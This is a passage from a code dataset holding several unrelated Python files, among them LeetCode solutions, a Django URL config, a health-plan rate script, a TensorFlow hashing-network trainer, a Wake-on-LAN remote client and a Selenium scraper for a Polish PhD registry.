required[ord(s[i]) - ord('a')]:\n count += 1\n if count == len(t):\n while present[ord(s[start])-ord('a')] > required[ord(s[start])-ord('a')] or required[ord(s[start])-ord('a')] == 0:\n present[ord(s[start]) - ord('a')] -= 1\n start += 1\n if minimum > i-start+1:\n minimum = i-start+1\n min_start = start\n i += 1\n\n return s[min_start : min_start+minimum]\n\nrr = Solution()\nprint(rr.minWindow(\"ADOBECODEBANC\", \"ABC\"))\n","sub_path":"Hashing/minimum-window-substring.py","file_name":"minimum-window-substring.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"2343907","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n\tpath('', views.PostList.as_view()),\n\tpath('post//', views.PostDetail.as_view()), # api/v1/instagram/1\n\tpath('users/', views.UserList.as_view()),\n\tpath('/', views.UserDetail.as_view())\n]","sub_path":"instagram/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"569806808","text":"\nimport optuna\nimport joblib\nimport pandas as pd\n\nfrom ..config import *\nfrom Opt import Opt\n\n\n\nclass model:\n def __init__(self):\n self.model = self.read_model(MODEL_PATH)\n self.data = None\n self.processed_data = None\n self.best_parameters = None\n\n def read_model(self, path):\n return joblib.load(path)\n\n def feed_storage(self, data: pd.DataFrame):\n self.data = data\n return self.data\n\n def process_data(self):\n df = self.data\n df[ZMIENNA_CZASU] = pd.to_datetime(df[ZMIENNA_CZASU])\n df = df.set_index(ZMIENNA_CZASU)\n df = df.resample(f'{RESAMPLE_TIME}S').mean()\n df = df.dropna().reset_index()\n df[f'{ZMIENNA_CELU}_train'] = df[ZMIENNA_CELU]\n df = df.set_index([ZMIENNA_CZASU, ZMIENNA_CELU])\n for col in df.columns:\n df[f'{col}_diff'] = df[col].diff()\n df[f'{col}_diff_2'] = df[col] - 2 * df[col].shift(1) + df[col].shift(2)\n self.processed_data = df[-1:].reset_index().set_index(ZMIENNA_CZASU).drop(labels=ZMIENNA_CELU, axis=1)\n return self.processed_data\n\n def optimize_parameters(self):\n study = optuna.create_study()\n study.optimize(Opt(model=self.model, processing=self.processed_data, X=self.data).objective, timeout=1)\n self.best_parameters = study.best_params\n return self.best_parameters","sub_path":"app/model/opt_model.py","file_name":"opt_model.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"440002493","text":"from collections import OrderedDict\nimport sqlite3\nfrom sqlite3 import Error\nimport collections\nimport csv\n\nzipcode_state_rate_area = OrderedDict()\n''' I turned csv into .db file with DB Browser for SQLite, it's a simple program to review .db files. It was more \n convenient for me to work on .db with SQLite, I hope it's okay.\n plans.csv ==> plans.db\n slcsp.csv ==> slcsp.db\n zips.csv ==> zips.db \n'''\n\ndef create_connection(db_file):\n try:\n conn = sqlite3.connect('{}.db'.format(db_file), timeout=1000)\n return conn\n except Error as e:\n print(e)\n return None\n\n\ndef read_zips():\n zips = []\n connection = create_connection('slcsp')\n c = connection.cursor()\n zipcodes = c.execute(\"\"\"SELECT zipcode FROM slcsp\"\"\") # Reading necessary zip codes...\n for each in zipcodes:\n zips.append(each[0])\n return zips\n\n'''In this function, we are getting the necessary info for each zipcode to compare in plans...'''\n\ndef get_zips():\n zips = read_zips()\n connection = create_connection('zips')\n c = connection.cursor()\n for each in zips:\n\n # Pulling the zipcode, state, rate_area, name. We'll need some of them in next function..\n\n data = c.execute(\"\"\"SELECT zipcode, state, rate_area, name FROM zips WHERE zipcode=?\"\"\", (each,))\n for every in data:\n #print(every[0], every[1], every[2], every[3])\n\n '''\n If zipcode is already exists in our dictionary check whether if its rate_area is same or not...\n So, if it is not same, we cannot (or shouldn't) calculate the SLCSP according to description...\n '''\n\n if every[0] in zipcode_state_rate_area:\n try:\n if every[2] != zipcode_state_rate_area[every[0]]['rate_area']:\n zipcode_state_rate_area[every[0]] = {'rate_area' :None, 'state' :None}\n except: continue\n\n '''If zipcode is not in our dictionary, then append it with rate_area and state...'''\n else:\n zipcode_state_rate_area[every[0]] = {'rate_area' :every[2], 'state' :every[1]}\n search(zipcode_state_rate_area)\n\n'''In this function, we are getting the rate for each zipcode. SQL statement doing the most of the job.'''\n\ndef search(info):\n final_dict = OrderedDict()\n\n for each in info.items():\n num = 0\n final_dict[each[0]] = {'rate': ''}\n print(each[0])\n\n '''\n If rate_area is None, it means it cannot be determined according to description. So, we only want the ones\n where we can determine the rate of zipcode. BUT I'm appending all zipcodes and rates to final_dict before \n proceed any further. Because, we want to leave blank the rate of zipcode whose rate cannot be determined...\n '''\n\n if each[1]['rate_area'] != None:\n connection = create_connection('plans')\n c = connection.cursor()\n\n '''\n As we are calculating the Silver plan, I want metal_level to be 'Silver'. I ordered them since I want to get\n second lowest and limited it with 2.\n '''\n\n data = c.execute(\"\"\"SELECT state, metal_level, rate_area, rate FROM plans WHERE state=? AND rate_area=? AND\n metal_level='Silver' ORDER BY rate ASC LIMIT 2\"\"\", (each[1]['state'], each[1]['rate_area'],))\n\n '''\n Some of zipcodes have only one Silver plan, we cannot determine the second lowest. So, I'm checking if it \n has silver plans more than 1. If so, we can get the second one, if not, leave it as None.\n '''\n\n for every in data:\n num += 1\n if num == 2:\n zipcode = each[0]\n final_dict[zipcode] = {'rate' :every[3]}\n\n '''Finally, appending the zipcodes and rates to .csv file...'''\n\n with open('final.csv', 'w') as w:\n writer = csv.DictWriter(w, ['zipcode', 'rate'], lineterminator='\\n')\n writer.writeheader()\n for zipcode, rate in final_dict.items():\n writer.writerow({'zipcode': zipcode, 'rate': rate['rate']})\n\n\nif __name__ == \"__main__\":\n get_zips()","sub_path":"SLCSP.py","file_name":"SLCSP.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"609090949","text":"import os\nimport inspect\nimport sys\n\nimport pytest\n\nimport bmds\n\n\n@pytest.fixture\ndef dataset():\n return bmds.ContinuousDataset(\n doses=[0, 10, 50, 150, 400],\n ns=[111, 142, 143, 93, 42],\n responses=[2.112, 2.095, 1.956, 1.587, 1.254],\n stdevs=[0.235, 0.209, 0.231, 0.263, 0.159])\n\n\ndef test_executable_path():\n\n parents = (\n bmds.Dichotomous,\n bmds.DichotomousCancer,\n bmds.Continuous,\n )\n\n for name, obj in inspect.getmembers(bmds):\n if inspect.isclass(obj):\n if obj not in parents and issubclass(obj, parents):\n exe = obj.get_exe_path()\n print(obj.__name__, exe)\n assert os.path.exists(exe)\n\n\n@pytest.mark.skipif(sys.platform != \"win32\",\n reason='BMDS can only be executed on Windows')\ndef test_execute(dataset):\n model = bmds.Logistic_213(dataset)\n model.execute()\n assert model.output_created is True\n","sub_path":"tests/test_execution.py","file_name":"test_execution.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"593184531","text":"from gym.envs.registration import register \nfrom gym import make\n\nLEVELS = ['lt_chasm', 'lt_hallway_slope', 'lt_horseshoe_color', 'lt_space_bounce_hard', \\\n'nav_maze_random_goal_01','nav_maze_random_goal_02', 'nav_maze_random_goal_03', 'nav_maze_random_goal_01_no_apples', 'nav_maze_random_goal_02_no_apples', 'nav_maze_static_01', \\\n'nav_maze_static_02', 'seekavoid_arena_01', 'stairway_to_melon', 'generated_maze_dense', 'generated_maze_sparse', 'generated_maze_no', 'generated_maze_sparse_rand', 'generated_maze_sparse_new_spawn',\n'generated_maze_dense_new_spawn', 'generated_maze_no_new_spawn', 'proc_gen_maze_sparse', 'proc_gen_maze_dense', 'proc_gen_maze_no', 'human_gen_maze_train']\n\nTEST_SUFFIXES = ['NEW', 'NEW4', 'NEWA', 'NEW4A', 'NEWno', 'NEW4no', 'NEWb', 'NEW4b', 'NEWA_DENSER', 'NEW4A_DENSER', 'NEWno_densest']\n\nfor rew_type in ['dense', 'sparse', 'no']:\n for i in range(1, 11):\n LEVELS.append(\"{}_reward_gen_maze_{}\".format(rew_type, i))\n\nfor rew_type in ['dense', 'sparse', 'no']:\n for i in range(20):\n LEVELS.append(\"validation_maze_{}_{}\".format(rew_type, i))\nLEVELS.append(\"dense_reward_gen_maze_155\")\nLEVELS.append(\"dense_reward_gen_maze_156\")\nLEVELS.append(\"human_gen_maze_100\")\nfor i in TEST_SUFFIXES:\n LEVELS.append(\"naren_manual_eliza_{}\".format(i))\nfor i in range(1,6):\n LEVELS.append(\"naren_manual_eliza_NEW4_var{}\".format(i))\n LEVELS.append(\"naren_manual_eliza_NEW4A_var{}\".format(i))\n LEVELS.append(\"naren_manual_eliza_NEW_var{}\".format(i))\n LEVELS.append(\"naren_manual_eliza_NEWA_var{}\".format(i))\n\nfor i in range(200):\n LEVELS.append(\"human_gen_maze_{}\".format(i))\n\nfor i in range(100):\n LEVELS.append(\"proc_gen_test_maze_{}_fixed\".format(i))\n LEVELS.append(\"proc_gen_train_maze_{}\".format(i))\n\nfor i in [2,3,4,8,9,10]:\n LEVELS.append(\"Maze{}E\".format(i))\n LEVELS.append(\"Maze{}E_A\".format(i))\n LEVELS.append(\"Maze{}E_NO\".format(i))\n\nfor rew_type in ['dense', 'sparse', 'no']:\n for i in range(20):\n LEVELS.append(\"validation_maze_{}_{}\".format(rew_type, i))\n \ndef _to_pascal(text):\n return ''.join(map(lambda x: x.capitalize(), text.split('_')))\n \nMAP = { _to_pascal(l):l for l in LEVELS }\n\nfor key, l in MAP.items():\n register(\n id='DeepmindLab%s-v0' % key ,\n entry_point='gym_deepmindlab.env:DeepmindLabEnv',\n kwargs = dict(scene = l)\n )\n #print('DeepmindLab%s-v0' % key)\n register(\n id='DeepmindLab%sWithDepth-v0' % key,\n entry_point='gym_deepmindlab.env:DeepmindLabEnv',\n kwargs = dict(scene = l, colors = 'RGBD_INTERLEAVED')\n )\n #print('DeepmindLab%sWithDepth-v0' % key)\n","sub_path":"gym_deepmindlab/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"619423704","text":"# -*- coding=utf8 -*-\n# !/usr/bin/python3\nimport socket\nimport json\nimport struct\n\n\ndef WOL(mac_address):\n if len(mac_address) == 12:\n pass\n elif len(mac_address) == 12 + 5:\n sep = mac_address[2]\n mac_address = mac_address.replace(sep, '')\n else:\n raise ValueError('Incorrect MAC address format')\n data = ''.join(['FFFFFFFFFFFF', mac_address * 16])\n send_data = b''\n for i in range(0, len(data), 2):\n byte_dat = struct.pack('B', int(data[i: i + 2], 16))\n send_data = send_data + byte_dat\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n sock.sendto(send_data, ('255.255.255.255', 7))\n sock.close()\n\n\nif __name__ == '__main__':\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # client.connect(('10.201.3.77', 37776))\n client.connect(('104.224.159.162', 37776))\n login_msg = b'{\"cmd\":\"login\",\"clientId\":\"client1\"}'\n client.sendall(login_msg)\n\n result = str(client.recv(1024), 'UTF-8')\n while result is not None and result != '':\n print('接收到服务端指令:', result)\n try:\n msg = json.loads(result)\n if msg['cmd'] == 'wol':\n mac = msg['mac']\n WOL(mac)\n else:\n print('未知指令:', result)\n except:\n print('未知指令:', result)\n finally:\n result = str(client.recv(1024), 'UTF-8')","sub_path":"socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"543982752","text":"import glob\r\nimport os.path\r\nimport random\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport Student_nets as student_net\r\nfrom tensorflow.python.platform import gfile\r\nfrom tensorflow.python.ops import array_ops\r\nimport os\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------\r\ndef read_image(path, num_per):\r\n train_data = []\r\n train_lable = []\r\n\r\n train_datas = []\r\n train_lables = []\r\n lables=[]\r\n\r\n roi = open(path) \r\n roi_path = roi.readlines()\r\n classnum = len(roi_path)//num_per\r\n trainnum = 0\r\n testnum = 0\r\n i = 0\r\n for i,image_list in enumerate(roi_path):\r\n if i % num_per < num_per/2:\r\n train_datas.append(image_list[:-1])\r\n train_lables.append(int(i/num_per))\r\n trainnum = trainnum +1\r\n lables=train_lables\r\n train_lable = np.zeros([trainnum, classnum], np.int64)\r\n\r\n i = 0\r\n for label in train_lables:\r\n train_lable[i][label] = 1\r\n i = i + 1\r\n\r\n print(trainnum,classnum)\r\n train_lables = train_lable.reshape([trainnum*classnum])\r\n\r\n return train_datas,train_lables\r\n#-----------------------------------------------------------------------------------------------------------------------\r\ndef Hash_loss(feature,label_batch,batch_size,omega_size):\r\n archer_feature,sabor_feature = tf.split(feature,[omega_size,batch_size-omega_size],axis = 0)\r\n archer_label,sabor_label = tf.split(label_batch,[omega_size,batch_size-omega_size],axis = 0)\r\n archer_matrix = tf.matmul(archer_feature,tf.transpose(archer_feature))\r\n sabor_matrix = tf.matmul(sabor_feature,tf.transpose(sabor_feature))\r\n\r\n archer_Similarity = tf.matmul(archer_label,tf.transpose(archer_label))\r\n sabor_Similarity = tf.matmul(archer_label,tf.transpose(sabor_label))\r\n archer_diag = tf.transpose(tf.reshape(tf.tile(tf.diag_part(archer_matrix),[omega_size]),[omega_size,omega_size]))\r\n archer_sabor_diag = tf.transpose(tf.reshape(tf.tile(tf.diag_part(archer_matrix),[batch_size-omega_size]),[batch_size-omega_size,omega_size]))\r\n sabor_diag = tf.reshape(tf.tile(tf.diag_part(sabor_matrix),[omega_size]),[omega_size,batch_size-omega_size])\r\n\r\n archer_distance = archer_diag + tf.transpose(archer_diag) - 2*archer_matrix\r\n sabor_distance = sabor_diag + archer_sabor_diag - 2*tf.matmul(archer_feature,tf.transpose(sabor_feature))\r\n archer_loss = tf.reduce_mean(1/2*archer_Similarity*archer_distance + 1/2*(1-archer_Similarity)*tf.maximum(180-archer_distance,0))\r\n sabor_loss = tf.reduce_mean(1/2*sabor_Similarity*sabor_distance + 1/2*(1-sabor_Similarity)*tf.maximum(180-sabor_distance,0))\r\n hash_loss = archer_loss + sabor_loss\r\n\r\n return hash_loss,archer_distance,sabor_distance\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------\r\nbatch_size = 20\r\nomega_size = 10\r\ncapacity=1000+3*batch_size\r\n\r\ndef main():\r\n tf.reset_default_graph()\r\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\" \r\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.70)\r\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\r\n \r\n logs_train_dir = './save_student/model.ckpt'\r\n path = 'SF.txt'\r\n num_per = 10\r\n train_data,train_label = read_image(path, num_per)\r\n train_size=len(train_data)\r\n batch, label = get_batch(train_data, train_label,train_size,batch_size,capacity,True)\r\n \r\n global_step = tf.Variable(0,trainable = False,name = \"global_step\")\r\n opt = tf.train.RMSPropOptimizer(0.001,0.9)\r\n\r\n feature_s1 = student_net.encode1(batch, False, False, scope_name = 'student1')\r\n feature_s2 = student_net.encode2(feature_s1, False, False, scope_name = 'student2')\r\n feature_s3 = student_net.encode3(feature_s2, False, False, scope_name = 'student3')\r\n feature_s4 = student_net.encode4(feature_s3, False, False, scope_name = 'student4')\r\n code = tf.sign(feature_s4)\r\n\r\n hash_loss, _, _ = Hash_loss(feature_s4, label, batch_size, omega_size)\r\n q_loss = tf.reduce_mean(tf.pow(tf.subtract(feature_s4, code), 2.0))\r\n DHN_loss = hash_loss+ 0.5*q_loss\r\n \r\n all_vars = tf.trainable_variables()\r\n t_vars = [var for var in all_vars if 'student' in var.name]\r\n \r\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(update_ops):\r\n optimizer = opt.minimize(DHN_loss,global_step = global_step, var_list = t_vars)\r\n\r\n sess.run(tf.global_variables_initializer()) \r\n saver = tf.train.Saver(t_vars,max_to_keep=0)\r\n\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\r\n steps=int(len(train_data)/batch_size)\r\n epoch=500\r\n count=0000\r\n print('start train_bottle')\r\n try:\r\n for e in range(epoch):\r\n if coord.should_stop():\r\n break\r\n for step in range(steps): \r\n count=count+1\r\n _, loss_= sess.run([optimizer,DHN_loss])\r\n if( (count)%10 == 0):\r\n print(\"After %d epoch %d training step(s),the loss is %g.\" % (e, count, loss_))\r\n if( (count)%10000 == 0):\r\n saver.save(sess,logs_train_dir,global_step=count)\r\n except tf.errors.OutOfRangeError:\r\n print('Done training -- epoch limit reached')\r\n finally:\r\n coord.request_stop()\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------\r\ndef get_batch(image, label,label_size,batch_size, Capacity,Shuffle):\r\n \r\n classnum=len(label)//len(image)\r\n image = tf.cast(image, tf.string)\r\n label = tf.convert_to_tensor(label,tf.int64)\r\n label = tf.reshape(label,[label_size,classnum])\r\n \r\n input_queue = tf.train.slice_input_producer([image, label],shuffle = Shuffle,capacity = Capacity)\r\n label = input_queue[1]\r\n image_contents = tf.read_file(input_queue[0])\r\n image = tf.image.decode_jpeg(image_contents, channels=3)\r\n image = tf.image.resize_images(image, [224, 224])\r\n \r\n image_batch,label_batch = tf.train.batch([image,label],batch_size= batch_size,num_threads= 1, capacity = Capacity)\r\n \r\n label_batch = tf.cast(label_batch, tf.float32)\r\n image_batch = tf.cast(image_batch, tf.float32)\r\n \r\n return image_batch, label_batch\r\n#-----------------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"train_student.py","file_name":"train_student.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"455914697","text":"import os, glob\nimport numpy as np\nfrom skimage.io import imread, imsave, imshow\nfrom PIL import Image, ImageTk\nfrom tqdm.notebook import trange\nfrom core.imageprep import create_crop_idx, crop_to_patch, construct_from_patch, create_crop_idx_whole\nimport time\n\nimport matplotlib.pyplot as plt\n\ndef stack_predict(input_imgpath, \n output_imgpath, \n cropidx, \n model, \n rescale = None,\n patch_size = (256, 256), \n predict_threshold = 0.5):\n \n IMG_HEIGHT = patch_size[0]\n IMG_WIDTH = patch_size[1]\n \n for idx in trange(len(input_imgpath)):\n \n inputimg = input_imgpath[idx]\n \n # load image\n img_tmp = imread(inputimg)\n \n # process rescale\n if rescale is not None: \n img_tmp = img_tmp * rescale \n \n # crop the image\n outputimg_tmp = crop_to_patch(img_tmp, cropidx, (IMG_HEIGHT, IMG_WIDTH))\n outputimg_tmp_re = np.reshape(outputimg_tmp, (outputimg_tmp.shape[0], \n outputimg_tmp.shape[1], \n outputimg_tmp.shape[2], 1))\n \n # push the crop images into the model\n img_predict_stack = model.predict(outputimg_tmp_re, batch_size = 16, \n # verbose = 1\n )\n \n outputimg = construct_from_patch(img_predict_stack, \n cropidx, \n target_size = (img_tmp.shape[0], img_tmp.shape[1]))\n \n # threshold the image\n outputimg_T = outputimg > predict_threshold\n \n # save image\n outputimg_T_pillow = Image.fromarray(outputimg_T)\n outputimg_T_pillow.save(os.path.join(output_imgpath, os.path.basename(inputimg)))\n\ndef stack_predict_v2(input_imgpath, \n output_imgpath, \n cropidx, \n model, \n rescale = None,\n patch_size = (256, 256),\n predict_threshold = 0.5):\n \n size_factor = 32\n \n IMG_HEIGHT = patch_size[0]\n IMG_WIDTH = patch_size[1]\n \n for idx in trange(len(input_imgpath)):\n \n inputimg = input_imgpath[idx]\n \n # load image\n img_tmp = imread(inputimg)\n \n img_height = img_tmp.shape[0]\n img_width = img_tmp.shape[1]\n \n # process rescale\n if rescale is not None: \n img_tmp = img_tmp * rescale \n \n # predict main region\n \n \n img_tmp_crop = img_tmp[:img_tmp.shape[0]//size_factor * size_factor, :img_tmp.shape[1]//size_factor * size_factor]\n img_tmp_crop = img_tmp_crop.reshape(1, img_tmp_crop.shape[0], img_tmp_crop.shape[1], 1)\n \n start = time.time()\n img_tmp_crop_predict_main = model.predict(img_tmp_crop, batch_size = 16)\n end = time.time()\n print('time for main: {}'.format(end-start))\n \n img_tmp_crop_predict_main = img_tmp_crop_predict_main.reshape(img_tmp_crop_predict_main.shape[1],\n img_tmp_crop_predict_main.shape[2])\n \n print(img_tmp_crop_predict_main.shape)\n \n \n ## predict the edge\n start = time.time()\n edge_patch = crop_to_patch(img_tmp, cropidx, (IMG_HEIGHT, IMG_WIDTH))\n edge_patch_re = np.reshape(edge_patch, (edge_patch.shape[0], \n edge_patch.shape[1], \n edge_patch.shape[2], 1))\n \n start = time.time()\n edge_patch_re_predict = model.predict(edge_patch_re, batch_size = 16)\n end = time.time()\n print('time for edge: {}'.format(end-start))\n print(edge_patch_re_predict.shape)\n \n img_tmp_crop_predict_edge = construct_from_patch(edge_patch_re_predict, \n cropidx, \n target_size = (img_height, img_width))\n \n # average\n outputimg_stack = np.full((2, img_height, img_width), np.nan)\n outputimg_stack[0, :img_tmp_crop_predict_main.shape[0], :img_tmp_crop_predict_main.shape[1]] = img_tmp_crop_predict_main\n \n img_tmp_crop_predict_edge_na = img_tmp_crop_predict_edge\n img_tmp_crop_predict_edge_na[:img_height - IMG_HEIGHT, :img_width - IMG_WIDTH] = np.nan\n outputimg_stack[1, :, :] = img_tmp_crop_predict_edge\n \n outputimg = np.nanmean(outputimg_stack, axis = 0)\n \n # outputimg_T = outputimg\n \n # threshold the image\n outputimg_T = outputimg > predict_threshold\n \n \n # save image\n outputimg_T_pillow = Image.fromarray(outputimg_T)\n outputimg_T_pillow.save(os.path.join(output_imgpath, os.path.basename(inputimg)))\n \n ","sub_path":"core/train_predict.py","file_name":"train_predict.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"570117643","text":"# https://leetcode.com/explore/interview/card/top-interview-questions-medium/103/array-and-strings/776/\n# https://leetcode.com/problems/3sum/description/\n\n# 3Sum\n#\n# Given an array nums of n integers, are there elements a, b, c in\n# nums such that a + b + c = 0? Find all unique triplets in the array\n# which gives the sum of zero.\n\nimport collections\nimport unittest\n\n\nclass Solution:\n \n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n return self.three_sum3(nums)\n\n # Note: for each num, do 2sum (from left/right) for remaining data.\n #\n # - sort A first\n # - for each starting position i, do 2sum 2 pointer (left/right)\n # search from i+1 to end of array.\n # - since array is sorted, we can do the 2sum in O(n) time by\n # scanning left/right to the center until they meet.\n # left++ if 3sum is < target\n # right-- if 3sum is > target\n # if equal, add result, and skip any left/right that are the same.\n # - no need to use a set/etc to track the return result, if we can\n # ensure we only add unique data.\n #\n # Don't need to search prior to i, since any found match would've\n # been found earlier (when i was at that position).\n\n # based on a guy's java solution, damn it damn it damn it!\n # more optimized/easier to read based on a python guy's post.\n #\n # don't need to create a set/hashtable, just use 2 pointer 2sum search\n # 313 / 313 test cases passed.\n # Status: Accepted\n # Runtime: 1076 ms (beats 40.01% of py3)\n # Runtime: 1004 ms (beats 48.81% of py3)\n def three_sum3(self, A):\n n = len(A)\n A.sort()\n res = []\n for i in range(0, n-2): # i: starting pos of all 3-tuple\n if i > 0 and A[i] == A[i-1]: # skip if same as last one\n continue\n l, r = i+1, n-1 # left/right pointer (all after i)\n while l < r:\n s = A[i] + A[l] + A[r] # calculate current sum of 3 items\n if s < 0: # if less, advance left pointer (i remains unchanged)\n l += 1\n elif s > 0: # if more, advance right pointer (i remains unchanged)\n r -= 1\n else: # equals target 0, add tuplet, and skip left/right that are the same\n res.append([A[i], A[l], A[r]]) # sorted so unique\n while l < r and A[l] == A[l+1]: # advance left if same\n l += 1\n while l < r and A[r] == A[r-1]: # decrease right if same\n r -= 1\n l += 1 # advance left/right pointer for next round\n r -= 1\n return res\n\n\n# what I came up with... for each i, 2sum remaining items\nclass SolutionMe:\n\n # still time limited exceeded??\n def three_sum2(self, A):\n\n if not A: # if no input\n return []\n n = len(A)\n if n < 3: # or less than 3 elements\n return []\n retval = set()\n\n # A.sort() # we sort A first\n counter = collections.Counter(A) # build freq chart\n\n # create new array\n B = []\n for c in counter:\n for i in range(counter[c]):\n B.append(c)\n\n for i in range(n):\n for j in range(i+1, n):\n a = B[i]\n b = B[j]\n counter[a] -= 1\n counter[b] -= 1\n x = a + b\n y = 0 - x\n if y in counter and counter[y] > 0:\n retval.add(tuple(sorted([a, b, y])))\n counter[a] += 1\n counter[b] += 1\n return list(retval)\n\n # 123 / 313 test cases passed, wrong answer, hmmm\n # 311 / 313 test cases passed, time limit exceeded, hehe\n # still time limit exceeded after not creating sets each time\n def three_sum1(self, A):\n\n if not A: # if no input\n return []\n n = len(A)\n if n < 3: # or less than 3 elements\n return []\n\n A.sort() # we sort A first\n counter = collections.Counter(A) # build freq chart\n\n retval = set()\n last = None\n\n # for each element, reduce to 2 sum\n for i in range(n):\n v = A[i]\n if v == last: # skip if same as last one looked at\n continue\n last = v\n # rest = A[:i] + A[i+1:] # array without this element\n rest = A[i+1:] # rest of array, no need to look prior\n counter[v] -= 1 # remove v from frequency table\n pairs = self.two_sum(rest, 0-v, counter)\n for p in pairs:\n retval.add(tuple(sorted([v, p[0], p[1]])))\n counter[v] += 1 # restore v in frequency table\n\n return list(retval)\n\n def two_sum(self, A, target, counter):\n \"\"\"Return ALL the tuple that sums to target\"\"\"\n if not A or len(A) < 2:\n return []\n\n retval = []\n for x in A: # for each value in A\n counter[x] -= 1 # remove x from counter temporarily\n v = target - x # calc the complement\n if v in counter and counter[v] > 0: # if have complement\n retval.append([x, v]) # add tuple\n counter[x] += 1 # remove x from counter temporarily\n\n return retval\n\n\nclass Test3Sum(unittest.TestCase):\n\n def setUp(self):\n self.sol = Solution()\n\n def test1(self):\n A = [-1, 0, 1, 2, -1, -4]\n v = self.sol.threeSum(A)\n print(v)\n\n def test2(self):\n A = [-4,-2,-2,-2,0,1,2,2,2,3,3,4,4,6,6]\n v = self.sol.threeSum(A)\n print(v)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"leetcode/2-medium/1-arraystring/1-3sum/3sum.py","file_name":"3sum.py","file_ext":"py","file_size_in_byte":5757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"312302632","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport time\n\nfrom bs4 import BeautifulSoup\nimport mechanize\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom common.PathCreator import PathCreator\nfrom polon.POLonScraper import POLonScraper\n\nreload(sys)\nsys.setdefaultencoding(\"utf8\")\n\n\nclass POLonPhDScraper23072015(POLonScraper):\n def __init__(self, site='https://polon.nauka.gov.pl/opi/aa/drh/zestawienie?execution=e1s1'):\n POLonScraper.__init__(self, site)\n self.num_of_all_pages = self.__get_num_of_all_pages(self.site)\n\n def scrap(self):\n pages = []\n i = 1\n\n # prepare browser\n driver = webdriver.Firefox()\n driver.maximize_window()\n driver.get(self.site)\n wait = WebDriverWait(driver, 30)\n time.sleep(2)\n\n bad = True\n while bad:\n try:\n # paginate by 100\n select = Select(driver.find_element_by_id(\"filter:drhPageTable:j_idt162:j_idt165:j_idt171\"))\n select.select_by_visible_text(\"100\")\n bad = False\n except:\n pass\n\n while True:\n\n # wait until there is no loading spinner\n wait.until(EC.invisibility_of_element_located((By.ID, \"loadingPopup_content_scroller\")))\n time.sleep(1)\n\n # get next page number\n # current_page = driver.find_element_by_class_name(\"rf-ds-act\").text\n # print(\"Current page: %s\" % str(current_page))\n\n # collect results - pages\n page = driver.page_source\n pages.append(page)\n\n i += 1\n\n # proceed to the next page\n try:\n next_page = driver.find_element_by_link_text(u\"»\")\n next_page.click()\n except NoSuchElementException:\n break\n\n driver.close()\n\n return pages\n\n def save_to_files(self, pages, path):\n\n i = 1\n for page in pages:\n with open(path % i, \"w\") as text_file:\n text_file.write(page)\n i += 1\n\n def scrap_and_save_to_files(self, path):\n\n pages = []\n i = 1\n\n # prepare browser\n driver = webdriver.Firefox()\n driver.maximize_window()\n driver.get(self.site)\n wait = WebDriverWait(driver, 30)\n time.sleep(2)\n\n bad = True\n while bad:\n try:\n # paginate by 100\n select = Select(driver.find_element_by_id(\"filter:drhPageTable:j_idt162:j_idt165:j_idt171\"))\n select.select_by_visible_text(\"100\")\n bad = False\n except:\n pass\n\n while True:\n\n # wait until there is no loading spinner\n wait.until(EC.invisibility_of_element_located((By.ID, \"loadingPopup_content_scroller\")))\n time.sleep(1)\n\n # get next page number\n current_page = driver.find_element_by_class_name(\"rf-ds-act\").text\n print(\"Current page: %s\" % str(current_page))\n\n # collect results - pages\n page = driver.page_source\n pages.append(page)\n\n # save pages to files\n with open(path % i, \"w\") as text_file:\n text_file.write(page)\n\n i += 1\n\n # proceed to the next page\n try:\n next_page = driver.find_element_by_link_text(u\"»\")\n next_page.click()\n except NoSuchElementException:\n break\n\n driver.close()\n\n return pages\n\n def __get_num_of_all_pages(self, site):\n browser = mechanize.Browser()\n browser.set_handle_robots(False)\n 